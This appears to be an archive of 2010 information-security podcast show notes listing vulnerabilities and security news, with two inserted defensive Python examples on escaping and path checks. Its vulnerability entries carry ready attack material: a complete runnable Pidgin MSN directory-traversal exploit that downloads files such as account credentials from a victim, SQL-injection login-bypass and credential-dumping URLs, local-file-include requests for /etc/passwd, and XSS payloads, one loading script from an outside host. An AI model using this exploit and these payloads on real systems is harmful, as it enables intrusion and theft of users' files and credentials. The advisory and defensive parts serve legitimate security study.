  6. The Core Design Scriptegrator component for Joomla! is subject to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. Example URL:  http://www.sample.com/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd
  7. PHP is subject to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.  An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. NOTE: In some configurations, attackers may exploit this issue to carry out HTML-injection attacks. Versions prior to PHP 5.2.12 are vulnerable. PHP code is available:
    <?php
    // overlong UTF-8 sequence
    echo htmlspecialchars("A\xC0\xAF&", ENT_QUOTES, 'UTF-8');
    // invalid Shift_JIS sequence
    echo htmlspecialchars("B\x80&", ENT_QUOTES, 'Shift_JIS');
    echo htmlspecialchars("C\x81\x7f&", ENT_QUOTES, 'Shift_JIS');
    // invalid EUC-JP sequence
    echo htmlspecialchars("D\x80&", ENT_QUOTES, 'EUC-JP');
    echo htmlspecialchars("E\xA1\xFF&", ENT_QUOTES, 'EUC-JP');
    echo htmlspecialchars("F\x8E\xFF&", ENT_QUOTES, 'EUC-JP');
    echo htmlspecialchars("G\x8F\xA1\xFF&", ENT_QUOTES, 'EUC-JP');
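
The PHP snippet in item 7 above feeds htmlspecialchars() byte sequences that are invalid in the declared charset; from PHP 5.2.12 the function returns an empty string for such input instead of letting the bytes through. The example below is added here and is not PHP's implementation: it is the same policy written in Python, with a strict decoder gating the escaper, next to a byte-oriented escaper that shows what a browser would otherwise receive. The seven inputs are the ones from the snippet; the mapping from the PHP charset names to Python codec names is an assumption made for the example.

```python
"""Charset-aware HTML escaping: reject invalid multibyte input (added example)."""
import html

# assumed mapping from the PHP charset names used above to Python codec names
CHARSET = {"UTF-8": "utf-8", "Shift_JIS": "shift_jis", "EUC-JP": "euc_jp"}


def safe_escape(data: bytes, charset: str):
    """Escape `data` for HTML, or return None when it is not valid in `charset`."""
    try:
        text = data.decode(CHARSET[charset], errors="strict")
    except UnicodeDecodeError:
        return None
    return html.escape(text, quote=True)


def lenient_escape(data: bytes, charset: str) -> bytes:
    """Byte-oriented escaper: only the ASCII specials are rewritten, so the
    invalid lead/trail bytes survive and reach the browser as-is."""
    out = data.replace(b"&", b"&amp;").replace(b"<", b"&lt;").replace(b">", b"&gt;")
    return out.replace(b'"', b"&quot;").replace(b"'", b"&#039;")


# the seven inputs from the PHP snippet above
VECTORS = [
    (b"A\xC0\xAF&", "UTF-8"),       # overlong UTF-8 encoding of '/'
    (b"B\x80&", "Shift_JIS"),       # 0x80 is not a valid Shift_JIS byte
    (b"C\x81\x7f&", "Shift_JIS"),   # 0x7f is not a valid trail byte
    (b"D\x80&", "EUC-JP"),          # 0x80 is not a valid EUC-JP byte
    (b"E\xA1\xFF&", "EUC-JP"),      # 0xff is not a valid trail byte
    (b"F\x8E\xFF&", "EUC-JP"),      # SS2 followed by an invalid byte
    (b"G\x8F\xA1\xFF&", "EUC-JP"),  # SS3 followed by an invalid second byte
]


def run_vectors():
    """safe_escape() over the seven vectors; every entry is None."""
    return [safe_escape(data, cs) for data, cs in VECTORS]


if __name__ == "__main__":
    for (data, cs), strict in zip(VECTORS, run_vectors()):
        print(cs, data, "strict:", strict, "lenient:", lenient_escape(data, cs))
```

The strict path decodes first and escapes second; an escaper that works on raw bytes cannot tell a lone lead byte from the start of a legitimate character, which is what lets the following `&` or `<` be swallowed into a multibyte sequence by the browser's decoder.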

News Items of Interest:
News item 1: http://www.pcadvisor.co.uk/news/index.cfm?RSS&NewsID=3213469

Intel was targeted by “sophisticated” attacks last month, about the same time that Google reported its network had been breached, allegedly by Chinese hackers.

In its annual report filed on Monday with the US Securities and Exchange Commission (SEC), Intel confirmed that it had been hit in January.

“We regularly face attempts by others to gain unauthorised access through the internet to our information technology systems by, for example, masquerading as authorised users or surreptitious introduction of software,” read the report. “These attempts, which might be the result of industrial or other espionage, or actions by hackers seeking to harm the company, its products, or end users, are sometimes successful. One recent and sophisticated incident occurred in January 2010 around the same time as the recently publicised security incident reported by Google.”

Intel did not reveal whether the attacks had accessed or stolen confidential company information, an admission that Google made last month when it broke the news that it, and other major Western corporations, had been struck by what it called “highly sophisticated and targeted” attacks.

News item 2: http://www.adobe.com/support/security/bulletins/apsb10-08.html

Adobe has fixed a critical vulnerability in Download Manager for the second time in six weeks.  The program is used to download the company’s two most popular products, Adobe Reader and Flash Player.  The bug, Adobe acknowledged in an advisory, “potentially allow[s] an attacker to download and install unauthorised software onto a user’s system”.

Israeli security researcher Aviv Raff disclosed the vulnerability last week, when he said that attackers could use the Download Manager to forcibly download and install any executable file, including attack code.

“If you go to Adobe’s website to install a security update for Flash, you really expose yourself to a zero-day attack,” Raff said.

Download Manager is not the update mechanism for Reader and Flash Player – that’s called Adobe Updater – but instead oversees file transfers from Adobe’s site.

News item 3: http://news.bbc.co.uk/2/hi/business/8533551.stm
The European Commission is looking into complaints about Google’s behaviour, the company has revealed.  The complaints were made by UK price comparison site Foundem, French legal search engine ejustice.fr, and Microsoft’s Ciao.  Google’s senior competition lawyer Julia Holtz said the internet giant was “confident” it operated within European competition law.  Foundem claims that its site is demoted in Google’s search results.  “Foundem… argues that our algorithms demote their site in our results because they are a vertical search engine and so a direct competitor to Google,” Google said.

Foundem founder Shivaun Raff said its problems with Google’s rankings were resolved in December 2009, but it was filing the complaint on behalf of other search firms.

News item 4: http://www.scribd.com/doc/25550091/Proj-Grey-Goose-report-on-Critical-Infrastructure-Attacks-Actors-and-Emerging-Threats
Kelly Jackson Higgins reports that attacks against the power grid are likely to rise and intensify during the next 12 months as smart grid research and pilot projects advance, according to utility security experts and a recently published report that analyzes threats to critical infrastructure.

The so-called Project Grey Goose Report on Critical Infrastructure points to state and/or non-state sponsored hackers from the Russian Federation of Independent States, Turkey, and China as the main threats to targeting and hacking into energy providers and other critical infrastructure networks.

Jeffrey Carr, principal investigator for Project Grey Goose and founder and CEO of GreyLogic, says he and other researchers working on the report initially focused on answering the question of whether there have been any successful cyberattacks on the utilities. “Some companies say there’s never been a successful attack against the grid, but that’s not true,” he says. “There have been at least 120 instances” of successful attacks, some of which are documented in the report and date back to 2001.

Several utility security experts agree that utility security administrators will have their hands full during the next year, as the transition from isolated, closed energy-generation and transmission networks to IP-based and wireless ones begins to take shape in the form of pilot smart grid projects.

News item 5: http://www.scmagazineus.com/ftc-notifies-100-organizations-about-p2p-leaks/article/164288/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+SCMagazineNews+%28SC+Magazine+News%29

The Federal Trade Commission (FTC) said it has identified widespread data leaks from businesses, schools and local governments on peer-to-peer (P2P) file-sharing networks.
As a consequence, the FTC recently alerted nearly 100 organizations whose sensitive information, including personal data about customers and employees, is currently residing on P2P networks. The notices were sent to both private and public organizations ranging in size from eight to tens of thousands of employees.

FTC Chairman Jon Leibowitz said in a statement: “For example, we found health-related information, financial records and drivers’ license and Social Security numbers — the kind of information that could lead to identity theft.” The FTC also released educational materials for businesses about the risks of P2P networks and ways to manage them.

News item 6: http://news.cnet.com/8301-13579_3-10457460-37.html?part=rss&subj=news&tag=2547-1_3-0-20
Apple notified developer Chillifresh that its Wobble iBoobs application was being removed from the App Store due to its “overtly sexual” nature. Since then, it appears that Apple has gone on a rampage of sex-oriented app removals.

Chillifresh claimed in a Saturday post that a discussion with Apple revealed that more than 5,000 apps have been affected by its new App Store content policy. Apple said the change was triggered by numerous customer complaints, according to Chillifresh.

Data from iPhone app-tracking Web site AppShopper supports the claim. AppShopper sister site MacRumors on Sunday reported that app removals went from about 100 a day to a high of almost 4,000 on Friday.
Chillifresh said on its Web site that an Apple representative told the developer that under its new App Store policy, it will not accept applications that in any way imply sexual content or include the following:
* images of women in bikinis
* images of men in bikinis
* images of skin
* silhouettes indicating that the app includes sexual images
* sexual connotations or innuendo
* sexually arousing content
Interestingly, some apps that include sexual content, such as Playboy’s, seem to have been missed by the recent purge, so far at least. Doing a search for “girls” on the App Store will bring up a variety of apps with bikini-clad women and others that appear to break the new rules Chillifresh said Apple outlined.

Episode 73 – N1H1


ISD Podcast Episode 73 for February 23, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

Vulnerabilities of Interest:

  1. The Linux kernel is subject to a RTO (Retransmission Timeouts) Remote Denial of Service Vulnerability.  Attackers can exploit this issue to cause an excessive load on CPU and network resources, denying service to legitimate users. Attackers can use readily available network utilities to exploit this issue.
  2. WSC CMS is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Attackers can use a browser to exploit this issue. The following example is available:
    1- http://www.sample.com/public/backoffice
    2- login with “admin” as user name and ‘or’ as password
  3. Gretech GOM Player is subject to a remote buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input. Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions. GOM Player 2.1.21.4846 is vulnerable; other versions may also be affected.
  4. Konversation IRC is subject to a remote denial-of-service vulnerability. An attacker may exploit this issue to crash the application, resulting in a denial-of-service condition.  Versions prior to Konversation 1.2.3 are vulnerable. An attacker can use readily available network utilities to exploit this issue.
  5. vBseo is subject to a Local File Include vulnerability.  Version 3.1.0 is vulnerable, though other versions may be impacted. Exploit code is available: http://www.sample.com/[path]/vbseo.php?vbseoembedd=1&vbseourl=[LFI]
  6. Official Portal 2007 is subject to multiple vulnerabilities, including SQL injection and Cross Site Scripting. Google Dork: “Official Portal 2007″ Exploit code is available. SQL injection: http://www.sample.com/?fa=content.detail&id=-72+union+select+1,concat_ws%280x3a,userid,username,pwd%29,3,4,5,6,7,8,9,10,11+from+tuser--
    Cross Site Scripting: http://www.sample.com/?fa=<SCRIPT/SRC="http://site.com/xss.js"></SCRIPT>

News Items of Interest:

News item 1:  http://gcn.com/articles/2010/02/19/nist-crypto-docs-021910.aspx

The National Institute of Standards and Technology has released two documents as part of its Cryptographic Key Management Project — a summary of a key management workshop held in June that explored the risks and challenges of handling cryptographic keys in new technological environments, and a draft of recommendations for agencies on transitioning to new algorithms and keys.

Key management is one of the most difficult tasks in cryptography, because a cryptographic algorithm or scheme is only as secure as the keys used to encrypt and decrypt data. The scalability and usability of the methods used to distribute keys are of particular concern. NIST’s key management project is an effort to improve the overall key management strategies to enhance the usability of cryptographic technology, provide scalability and support a global cryptographic key management infrastructure.

The first step in achieving those goals was a workshop NIST hosted in June that examined the obstacles in using the key management methodologies currently in use. It also covered alternative technologies that key management needs to accommodate and approaches for moving from current methodologies to more desirable methods.

The results of the workshop are summarized in NIST Interagency Report 7609. An approach to transitioning to new generations of keys and algorithms is provided in a draft of Special Publication 800-131, “Recommendation for the Transitioning of Cryptographic Algorithms and Key Sizes.”

News item 2: http://www.tzi.de/~edelkamp/secart

SECART – Second International Workshop on Security and Artificial Intelligence, Atlanta, Georgia, July 11, 2010.  Workshop themes include both applied and theoretical results regarding the application of AI techniques to security problems (or, alternatively, novel security issues caused by the use of AI techniques).  Possible topics include but are not limited to the following:

*  Knowledge Representation and Engineering for Cyber Security
*  Secure Web Services
*  Development of Trusted Software
*  Data Mining and Forensics
*  Automated Vulnerability Analysis
*  Automated Exploit and Attack Generation
*  Automated Alerting and Response
*  Diagnosis and Plan Recognition
*  Automating Security Analyses and Audits
*  Artificial Immune Systems
*  Privacy and Confidentiality
*  Intelligent User Interfaces for Security Applications
*  Security and Organizational Structure

WORKSHOP ORGANISERS

Chairs:
Mark Boddy, Adventium Labs, Minneapolis, USA, mark.boddy@adventiumlabs.org
Stefan Edelkamp, TZI, University Bremen, Germany, edelkamp@tzi.de
Robert P. Goldman, SIFT, LLC, Minneapolis, USA, rpgoldman@sift.info

Program Committee:
Lee Badger (NIST, US)
Bob Balzer (Teknowledge, US)
Mark Boddy (Adventium Labs, US)
Cas Cremers (ETH, Switzerland)
Stefan Edelkamp (U Bremen, G)
Chris Geib (U Edinburgh, GB)
Robert P. Goldman (SIFT, US)
Rachel Greenstadt (Drexel U, US)
Henry Kautz (U of Rochester, US)
Alessio Lomuscio (IC London, GB)
Norbert Pohlmann (IF(IS), G)
Anil Somayaji (Carleton U, CA)
Shannon Spires (Sandia Labs, US)
Tim Strayer (BBN Technologies, US)
Karsten Sohr (TZI Bremen, G)
Dan Thomsen (SIFT and CDA, US)
Luca Vigano (U Verona, I)
Yacine Zemali (LIFO, FR)

Deadline for submissions:   March 29, 2010
Notification of acceptance: April 15, 2010
Final versions due:         May 4, 2010

Articles of up to 8 pages in AAAI plain article style should be submitted in PDF format to the EasyChair system (https://www.easychair.org/login.cgi?conf=secart10) by the March 29, 2010 deadline.

Attendance fees will be posted as they become available from AAAI. In the past, AAAI has permitted workshop-only registrations. SECART is affiliated with AAAI-10.

News item 3: http://www.dailymail.co.uk/news/worldnews/article-1252738/Argentinian-hackers-plaster-countrys-flag-Falklands-newspaper-website-new-conflict-begins.html

Argentinian hackers drew first blood in the latest Falklands stand-off by plastering the country’s flag across the islands’ newspaper website.

The computer attack came as a British oil rig was set to begin searching for oil after arriving in the South Atlantic waters from Scotland.

The Argentine activists hacked into the English-language Penguin News to post a flag on the home page and an audio recording of the song “March of the Malvinas,” Argentina’s name for the Falklands.

They also wrote ‘the islands are Argentine’ and claimed the move was a ‘tribute’ to the country’s soldiers who died during the Falklands War.

The material has now been removed.

News item 4: http://twitter.com/th3j35t3r
Infamous patriot hacker The Jester (th3j35t3r) has released a video demonstration of the XerXeS DoS attack as it is unleashed on the Taliban website www.alemarah.com.

The video release follows an earlier announcement that The Jester has been working to improve and automate aspects of the attack method, which unlike a DDoS attack, requires only one low spec machine to implement.
The Jester is always quick to point out his claim that his attacks produce absolutely no permanent damage to the target site, or any intermediary nodes.

Episode 72 – http://5z8.info/super-nsfw_qzg


ISD Podcast Episode 72 for February 22, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com will be putting on their SANS version of the Data Recovery Class in Orlando at SANS 2010 March 8th to 12th. https://www.sans.org/registration/register.php?conferenceid=2191

Data Recovery Class April 12th to the 16th in Washington DC. Go to MyHardDriveDied.com or email smoulton at nicservices dot com for more information.

The next dc404 meeting will be at Outerzone near the Atlanta airport. Here’s their site for more info: http://www.outerz0ne.org/

March 15 – 20, 2010 SANS Audit 507: Auditing Networks, Perimeter and Systems  (http://www.sans.org/atlanta-auditing-networks-perimeters-2010-cs)
April 15 – 21, 2010  SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression (TM) (http://www.sans.org/atlanta-security-leadership-2010-cs)
May 17 – 21, 2010  SANS Security 566:  Implementing and Auditing the Twenty Critical Security Controls – In Depth  (http://www.sans.org/atlanta-critical-controls-2010-cs)

Vulnerabilities of Interest:

  1. Libpurple is subject to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks. Versions prior to Libpurple 2.6.5 are vulnerable.
    #!/usr/bin/env python
    """
    Pidgin MSN <= 2.6.4 file download vulnerability
    Mathieu GASPARD (gaspmat@gmail.com)

    Description:
    Pidgin is a multi-protocol Instant Messenger.

    This is an exploit for the vulnerability[1] discovered in Pidgin by Fabian Yamaguchi.
    The issue is caused by an error in the MSN custom smiley feature when processing emoticon requests,
    which could allow attackers to disclose the contents of arbitrary files via directory traversal attacks.

    Affected versions :
    Pidgin <= 2.6.4, Adium and other IM using Pidgin-libpurple/libmsn library.
    Plugin msn-pecan 0.1.0-rc2  (http://code.google.com/p/msn-pecan/) IS also vulnerable even if Pidgin is up to date

    Platforms :
    Windows, Linux, Mac

    Fix :
    Fixed in Pidgin 2.6.5
    Update to the latest version : http://www.pidgin.im/download/

    References :
    [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0013
    [2] http://www.pidgin.im/news/security/?id=42

    Usage :
    You need the Python MSN Messenger library : http://telepathy.freedesktop.org/wiki/Pymsn
    python pidgin_exploit.py -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE [-o OUTPUT_FILE] [-l]

    Example :
    # python pidgin_exploit.py -a foo@hotmail.com -c victim@hotmail.com -f ../accounts.xml [-o accounts.xml]

    ***********************************************************

    Pidgin MSN file download vulnerability (CVE-2010-0013)

    Usage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l]

    ***********************************************************

    Please enter the password for the account "foo@hotmail.com"
    Password:
    [+] Connecting to server
    [+] Authentication in progress
    [+] Synchronisation in progress
    [+] OK, all done, ready to proceed
    [+] Sending request for file "../accounts.xml" to "victim@hotmail.com"
    [+] Using session_id 974948028
    Current : 3606, total: 3881  (92%)
    [+] Got an answer from the contact
    ----------------
    <?xml version='1.0' encoding='UTF-8' ?>

    <account version='1.0'>
    ........
    """

    import warnings
    warnings.simplefilter("ignore", DeprecationWarning)
    import os
    import sys
    try:
        import pymsn
    except ImportError:
        print "Pymsn couldn't be loaded"
        print "On debian-like systems, the package is python-msn"
        sys.exit(-1)
    import gobject
    import logging
    import getpass
    import hashlib
    from optparse import OptionParser
    import signal
    import time

    SERVER_ADDRESS = 'messenger.hotmail.com'
    SERVER_PORT = 1863
    FD_OUT = sys.stdout
    MAINLOOP = None
    # seconds after which, if we didn't get an answer, we quit
    TIMEOUT = 5

    global_client = None

    def quit():
        MAINLOOP.quit()
        sys.exit(0)

    def check_if_succeeds():
        # if False, we didn't get a chunk so we won't get any file, so we quit
        if global_client.GOT_CONTROL_BLOB == False:
            print "[+] Didn't get an answer from the client after %d seconds, it's likely not vulnerable or the file requested doesn't exist/is not accessible" % TIMEOUT
            print "[+] Exiting"
            global_client.quit()

    # called when we get the result data, after our request
    def handle_answer(object, client):
        print "\n[+] Got an answer from the contact"
        d = object._data
        data = d.read()
        length = len(data)
        FD_OUT.write(data)
        # if we wrote output to stdout, don't close it
        if FD_OUT != sys.stdout:
            FD_OUT.close()
            print "[+] Wrote %d bytes to file" % length
        client.end = time.time()
        duration = client.end - client.begin
        print "[+] Download lasted %d seconds at %d bytes/s " % (duration, (length / duration))
        client.quit()

    def my_on_chunk_recv(transport, chunk):
        global_client._p2p_session_manager._transport_manager._on_chunk_received_OLD(transport, chunk)
        session_id = chunk.header.session_id
        blob_id = chunk.header.blob_id
        if session_id == global_client.session_id:
            # first blob is control, we "squeeze" it and keep only the second one
            if global_client.GOT_CONTROL_BLOB == False:
                #print "Got Control blob in our connection (session_id : %d, blob_id: %d)" % (session_id, blob_id)
                global_client.GOT_CONTROL_BLOB = True
            else:
                # if connection is complete, session_id is removed from data_blobs so we have to check before accessing it
                if global_client._p2p_session_manager._transport_manager._data_blobs.has_key(session_id):
                    current_blob = global_client._p2p_session_manager._transport_manager._data_blobs[session_id]
                    print "Current : %d, total: %d  (%d%%)\r" % (current_blob.current_size, current_blob.total_size, ((current_blob.current_size * 100) / current_blob.total_size)),
                    sys.stdout.flush()

    def error_handler(self, error_type, error):
        # __on_user_invitation_failed, probably because contact is offline/invisible
        if error_type == pymsn.event.ConversationErrorType.CONTACT_INVITE and \
           error == pymsn.event.ContactInviteError.NOT_AVAILABLE:
            print "[*] ERROR, contact didn't accept our invite, probably because it is disconnected/invisible"
            quit()
        # __on_message_undelivered, probably because contact is offline/invisible
        if error_type == pymsn.event.ConversationErrorType.MESSAGE and \
           error == pymsn.event.MessageError.DELIVERY_FAILED:
            print "[*] ERROR, couldn't send message, probably because contact is disconnected/invisible"
            quit()
        print "[*] Unhandled error, error_type : %d , error : %d" % (error_type, error)
        quit()

    class MyClient(pymsn.Client):
        def __init__(self, server, quit, victim, filename, list_only, proxies={}, transport_class=pymsn.transport.DirectConnection):
            # callback to quit
            self.quit = quit
            # victim from whom we request the file
            self.victim = victim
            # just list contacts for this account
            self.list_only = list_only
            # file we request
            self.filename = filename
            # to calculate download duration and speed
            self.begin = 0
            self.end = 0
            # session_id of the connection to retrieve the file
            self.session_id = 0
            # have we already seen the "control blob" for this connection
            self.GOT_CONTROL_BLOB = False
            pymsn.Client.__init__(self, server)
            # REALLY REALLY HACKISH
            # if contact is disconnected/invisible, a "NotImplementedError" exception is raised
            # and it can't be caught AFAIK so it needs to be redefined here
            # handler_class should be SwitchboardClient
            for handler_class, extra_args in self._switchboard_manager._handlers_class:
                handler_class._on_error = error_handler

    class MyMSNObjectStore(pymsn.p2p.MSNObjectStore):
        def __compute_data_hash(self, data):
            digest = hashlib.sha1()
            data.seek(0, 0)
            read_data = data.read(1024)
            while len(read_data) > 0:
                digest.update(read_data)
                read_data = data.read(1024)
            data.seek(0, 0)
            return digest.digest()

        # need to compute the SHA hash (SHAd in MSNObject) otherwise the function in MSNObjectStore complains because
        # the hash of the data we receive is not the hash we expected (hash we expect is the one we send, which is always the same here)
        def _outgoing_session_transfer_completed(self, session, data):
            handle_id, callback, errback, msn_object = self._outgoing_sessions[session]
            msn_object._data_sha = self.__compute_data_hash(data)
            super(MyMSNObjectStore, self)._outgoing_session_transfer_completed(session, data)

    class ClientEventHandler(pymsn.event.ClientEventInterface):

        def on_client_error(self, error_type, error):
            if error_type == pymsn.event.ClientErrorType.AUTHENTICATION:
                print "[+] Authentication failed, bad login/password"
                self._client.quit()
            else:
                print "[*] ERROR :", error_type, " ->", error

        def on_client_state_changed(self, state):
            #print "State changed to %s" % state
            if state == pymsn.client.ClientState.CLOSED:
                print "[+] Connection to server closed"
                self._client.quit()

            if state == pymsn.client.ClientState.CONNECTING:
                if self.current_state != state:
                    print "[+] Connecting to server"
                    self.current_state = state
            if state == pymsn.client.ClientState.AUTHENTICATING:
                if self.current_state != state:
                    print "[+] Authentication in progress"
                    self.current_state = state
            if state == pymsn.client.ClientState.SYNCHRONIZING:
                if self.current_state != state:
                    print "[+] Synchronisation in progress"
                    self.current_state = state

            if state == pymsn.client.ClientState.OPEN:
                print "[+] OK, all done, ready to proceed"
                self._client.profile.presence = pymsn.Presence.INVISIBLE
                contact_dict = {}
                for i in self._client.address_book.contacts:
                    contact_dict[i.account] = i
                if self._client.list_only:
                    for (k, v) in contact_dict.items():
                        print k + " (" + v.display_name + ")"
                    self._client.quit()
                else:
                    if self._client.victim not in contact_dict.keys():
                        print "[*] Error, contact %s not in your contact list" % self._client.victim
                        self._client.quit()
                    else:
                        contact = contact_dict[self._client.victim]
                        store = MyMSNObjectStore(self._client)
                        object = pymsn.p2p.MSNObject(contact, 65535, pymsn.p2p.MSNObjectType.CUSTOM_EMOTICON, self._client.filename, 'AAA=', '2jmj7l5rSw0yVb/vlWAYkK/YBwk=')
                        print "[+] Sending request for file \"%s\" to \"%s\"" % (self._client.filename, self._client.victim)
                        self._client.begin = time.time()
                        store.request(object, [handle_answer, self._client])
                        # at this moment, we got only one session_id, the one we will use to request the file
                        for k in store._outgoing_sessions.keys():
                            print "[+] Using session_id %d" % k._id
                            self._client.session_id = k._id
                        # hack to set up my own callback each time we receive a chunk, used to print the percentage of the download
                        self._client._p2p_session_manager._transport_manager._on_chunk_received_OLD = self._client._p2p_session_manager._transport_manager._on_chunk_received
                        self._client._p2p_session_manager._transport_manager._on_chunk_received = my_on_chunk_recv
                        # if no file transfer received from the victim after TIMEOUT seconds, quit
                        gobject.timeout_add(TIMEOUT * 1000, check_if_succeeds)

        def __init__(self, client):
            self.current_state = None
            pymsn.event.ClientEventInterface.__init__(self, client)

    if __name__ == '__main__':
        print "***********************************************************\n"
        print "Pidgin MSN file download vulnerability (CVE-2010-0013)\n"
        print "Usage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l]\n"
        print "***********************************************************\n"

        usage = "Usage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l] "
        parser = OptionParser(usage=usage)
        parser.add_option("-f", "--file", dest="filename", default=None,
                          help="File requested to remote contact")
        parser.add_option("-o", "--output", dest="output_file", default=None,
                          help="Where to write received file, STDOUT otherwise")
        parser.add_option("-a", "--account", dest="account", default=None,
                          help="MSN account to use")
        parser.add_option("-c", "--contact", dest="contact", default=None,
                          help="Contact to request file from")
        parser.add_option("-l", "--list", dest="list_only", action="store_true", default=False,
                          help="Just print contact list for your account and exit")

        (options, args) = parser.parse_args()
        if not options.filename or not options.account or not options.contact:
            if not (options.account and options.list_only):
                print "Error, parameter missing"
                parser.print_help()
                sys.exit(-1)

        if options.output_file != None:
            try:
                FD_OUT = open(options.output_file, "wb")
            except Exception, e:
                print "Cannot open file %s (%s)" % (options.output_file, e)
                sys.exit(-1)

        MAINLOOP = gobject.MainLoop()

        # signal handlers are called with (signum, frame)
        def sigterm_cb(signum, frame):
            gobject.idle_add(quit)

        signal.signal(signal.SIGTERM, sigterm_cb)

        logging.basicConfig(level=logging.CRITICAL)  # allows us to see the protocol debug
        server = (SERVER_ADDRESS, SERVER_PORT)
        client = MyClient(server, quit, options.contact, options.filename, options.list_only)
        global_client = client
        client_events_handler = ClientEventHandler(client)
        print "Please enter the password for the account \"%s\"" % options.account
        try:
            passwd = getpass.getpass()
        except KeyboardInterrupt:
            quit()

        login_info = (options.account, passwd)
        client.login(*login_info)
        try:
            MAINLOOP.run()
        except KeyboardInterrupt:
            quit()

  2. vBulletin is subject to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. These issues affect vBulletin 4.0.2; other versions may also be affected. Example URLs:
    http://www.sample.com/upload/calendar.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/faq.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/forum.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/usercp.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/subscription.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/showthread.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/showgroups.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/sendmessage.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/search.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/register.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/profile.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/private.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/online.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/newthread.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/misc.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/memberlist.php?=>"'><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/member.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/inlinemod.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/index.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://www.sample.com/upload/forumdisplay.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
  3. phpBugTracker is subject to a remote file-disclosure vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to view local files in the context of the webserver process, which may aid in further attacks. This issue affects phpBugTracker 1.0.1; other versions may be vulnerable as well. Example URL: http://www.sample.com/[path]/attachment.php?filename=./config.php
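As an added example (not code from the podcast, libpurple or phpBugTracker), a Python helper showing the confinement check that both the MSN custom-smiley handler in item 1 and attachment.php in item 3 lack: a requested resource name must be a single path component and must resolve inside a dedicated directory that holds nothing but served files. Function and directory names are mine; note that a request such as ./config.php is only harmless if the base directory contains no application code.

```python
import os
import posixpath


def safe_resource_path(base_dir, requested):
    """Map an untrusted resource name onto a file inside base_dir.

    Returns the absolute path to serve, or None when the request must be
    refused. Two layers are applied:
      1. the name is normalised and must be exactly one path component
         (no '/', no '..', no empty or '.' name, no NUL byte), which rejects
         traversal such as '../accounts.xml' or '../../etc/passwd' outright;
      2. the joined path is canonicalised with realpath() and its parent
         directory must be base_dir itself, so a symlink inside the
         directory that points elsewhere is refused as well.
    """
    if not isinstance(requested, str) or "\x00" in requested:
        return None
    # Treat backslashes as separators too, so Windows-style input is covered.
    name = posixpath.normpath(requested.replace("\\", "/"))
    if name in ("", ".", "..") or "/" in name:
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    if os.path.dirname(candidate) != base:
        return None
    return candidate


if __name__ == "__main__":
    # Constructed requests: the traversal strings quoted on this page plus
    # two ordinary names. The directory need not exist for the check to run.
    for req in ["../accounts.xml", "../../../etc/passwd", "/etc/passwd",
                "..", "smile.png", "./config.php"]:
        print("%-22r -> %r" % (req, safe_resource_path("/srv/smileys", req)))
```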

News Items of Interest:

News item 1:  http://www.allaboutjazz.com/php/news.php?id=50220

